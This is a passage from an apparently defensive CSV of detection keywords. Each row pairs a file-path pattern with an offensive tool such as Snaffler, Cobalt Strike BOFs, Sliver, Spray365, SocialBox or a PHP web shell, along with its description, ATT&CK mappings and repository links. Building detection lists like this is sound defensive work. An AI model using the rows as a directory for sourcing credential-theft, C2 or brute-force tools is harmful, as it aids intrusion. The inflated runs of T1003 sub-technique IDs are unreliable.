- T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" +"*/SnaffCore/*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" +"*/snafflertest/*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" +"*/SnaffPoint.git*","offensive_tool_keyword","SnaffPoint","A tool for pointesters to find candies in SharePoint","T1210.001 - T1087.002 - T1059.006","TA0007 - TA0002 - TA0006","N/A","N/A","Discovery","https://github.com/nheiniger/SnaffPoint","1","1","N/A","7","2","191","19","2022-11-04T13:26:24Z","2022-08-25T13:16:06Z" +"*/sniff.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*/sniffer.git*","offensive_tool_keyword","sniffer","A modern alternative network traffic sniffer.","T1040 - T1052.001 - T1046 - T1552.002","TA0011 - TA0007 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/chenjiandongx/sniffer","1","1","N/A","N/A","7","668","58","2022-07-27T15:13:57Z","2021-11-08T15:36:03Z" +"*/sniffer-detect.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/snmp-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/snmp-hh3c-logins.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/snmp-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/snmp-interfaces.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/snmp-ios-config.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/snmp-netstat.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/snmp-processes.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/snmp-sysdescr.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/snmp-win32-services.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/snmp-win32-shares.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/snmp-win32-software.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/snmp-win32-users.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/snmpwn.git*","offensive_tool_keyword","snmpwn","SNMPwn is an SNMPv3 user enumerator and attack tool. It is a legitimate security tool designed to be used by security professionals and penetration testers against hosts you have permission to test. It takes advantage of the fact that SNMPv3 systems will respond with Unknown user name when an SNMP user does not exist. allowing us to cycle through large lists of users to find the ones that do.","T1210 - T1212 - T1558","TA0001 - TA0002","N/A","N/A","Exploitation tools","https://github.com/hatlord/snmpwn","1","1","N/A","N/A","3","222","50","2020-08-23T10:41:38Z","2016-06-16T10:31:13Z" +"*/snmpwn.rb*","offensive_tool_keyword","snmpwn","SNMPwn is an SNMPv3 user enumerator and attack tool. It is a legitimate security tool designed to be used by security professionals and penetration testers against hosts you have permission to test. It takes advantage of the fact that SNMPv3 systems will respond with Unknown user name when an SNMP user does not exist. allowing us to cycle through large lists of users to find the ones that do","T1210 - T1212 - T1558","TA0001 - TA0002","N/A","N/A","Exploitation tools","https://github.com/hatlord/snmpwn","1","1","N/A","N/A","3","222","50","2020-08-23T10:41:38Z","2016-06-16T10:31:13Z" +"*/SocialBox.sh*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/SocialBox-Termux","1","1","N/A","7","10","2419","268","2023-07-14T10:59:10Z","2019-03-28T18:07:05Z" +"*/SocialBox-Termux*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/SocialBox-Termux","1","1","N/A","10","10","2419","268","2023-07-14T10:59:10Z","2019-03-28T18:07:05Z" +"*/SocialPwned*","offensive_tool_keyword","SocialPwned","SocialPwned is an OSINT tool that allows to get the emails. from a target. published in social networks like Instagram. Linkedin and Twitter to find the possible credential leaks in PwnDB or Dehashed and obtain Google account information via GHunt.","T1596","TA0002","N/A","N/A","OSINT exploitation tools","https://github.com/MrTuxx/SocialPwned","1","1","N/A","N/A","9","800","93","2023-08-12T21:59:23Z","2020-04-07T22:25:38Z" +"*/socks-auth-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/socks-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/socks-open-proxy.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/spacerunner.exe*","greyware_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","7","2","185","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z" +"*/SpaceRunner.git*","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","1","N/A","7","2","185","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z" +"*/SpamChannel.git*","offensive_tool_keyword","SpamChannel","poof emails from any of the +2 Million domains using MailChannels","T1566 - T1566.001","TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/SpamChannel","1","1","N/A","8","3","257","28","2023-09-21T12:25:03Z","2022-12-20T21:31:55Z" +"*/spawn.git*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that spawns a sacrificial process. injects it with shellcode. and executes payload. Built to evade EDR/UserLand hooks by spawning sacrificial process with Arbitrary Code Guard (ACG). BlockDll. and PPID spoofing.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/spawn","1","1","N/A","10","10","408","71","2023-03-08T15:53:44Z","2021-07-17T16:35:59Z" +"*/spellbound.git*","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ","T1105 - T1132 - T1059.003 - T1043 - T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","1","N/A","10","10","37","3","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z" +"*/spellgen.py *","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ","T1105 - T1132 - T1059.003 - T1043 - T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","0","N/A","10","10","37","3","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z" +"*/spellstager.py *","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ","T1105 - T1132 - T1059.003 - T1043 - T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","0","N/A","10","10","37","3","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z" +"*/spider.yaml*","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","1","N/A","N/A","10","4716","845","2023-09-16T05:02:26Z","2018-11-10T04:17:18Z" +"*/spider_plus.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/SpiderFoot-*.log.cs*","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Information Gathering","https://www.spiderfoot.net/","1","0","N/A","6","10","N/A","N/A","N/A","N/A" +"*/SpiderFoot.csv*","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Information Gathering","https://www.spiderfoot.net/","1","0","N/A","6","10","N/A","N/A","N/A","N/A" +"*/spiderfoot.git*","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Information Gathering","https://www.spiderfoot.net/","1","1","N/A","6","10","N/A","N/A","N/A","N/A" +"*/SpiderMate/Jatayu*","offensive_tool_keyword","Jatayu","Stealthy Stand Alone PHP Web Shell","T1071","TA0005","N/A","N/A","Shell spawning","https://github.com/SpiderMate/Jatayu","1","1","N/A","N/A","1","31","8","2019-09-12T17:03:13Z","2019-09-12T09:04:10Z" +"*/splunk_whisperer.git*","offensive_tool_keyword","SplunkWhisperer2","Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations","T1068 - T1059.003 - T1071.001","TA0003 - TA0002 - TA0011","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cnotin/SplunkWhisperer2","1","1","N/A","9","3","239","53","2022-09-30T16:41:17Z","2019-02-24T18:05:51Z" +"*/SplunkWhisperer2.git*","offensive_tool_keyword","SplunkWhisperer2","Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations","T1068 - T1059.003 - T1071.001","TA0003 - TA0002 - TA0011","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cnotin/SplunkWhisperer2","1","1","N/A","9","3","239","53","2022-09-30T16:41:17Z","2019-02-24T18:05:51Z" +"*/spoof/dns*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/spoof/mdns*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/spoof/spoof_windows.*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*/SpookFlare.git*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" +"*/spooler.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/spoolsystem/SpoolTrigger/*","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" +"*/spray/spray.py*","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","1","N/A","N/A","3","296","53","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z" +"*/Spray365*","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","1","N/A","N/A","3","296","53","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z" +"*/Spray-AD.*","offensive_tool_keyword","cobaltstrike","A Cobalt Strike tool to audit Active Directory user accounts for weak - well known or easy guessable passwords.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Spray-AD","1","1","N/A","10","10","408","58","2022-04-01T07:03:39Z","2020-01-09T10:10:48Z" +"*/SprayAD.exe*","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","10","10","885","152","2023-05-03T19:35:38Z","2022-04-22T13:43:35Z" +"*/Spray-AD/*","offensive_tool_keyword","cobaltstrike","A Cobalt Strike tool to audit Active Directory user accounts for weak - well known or easy guessable passwords.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - 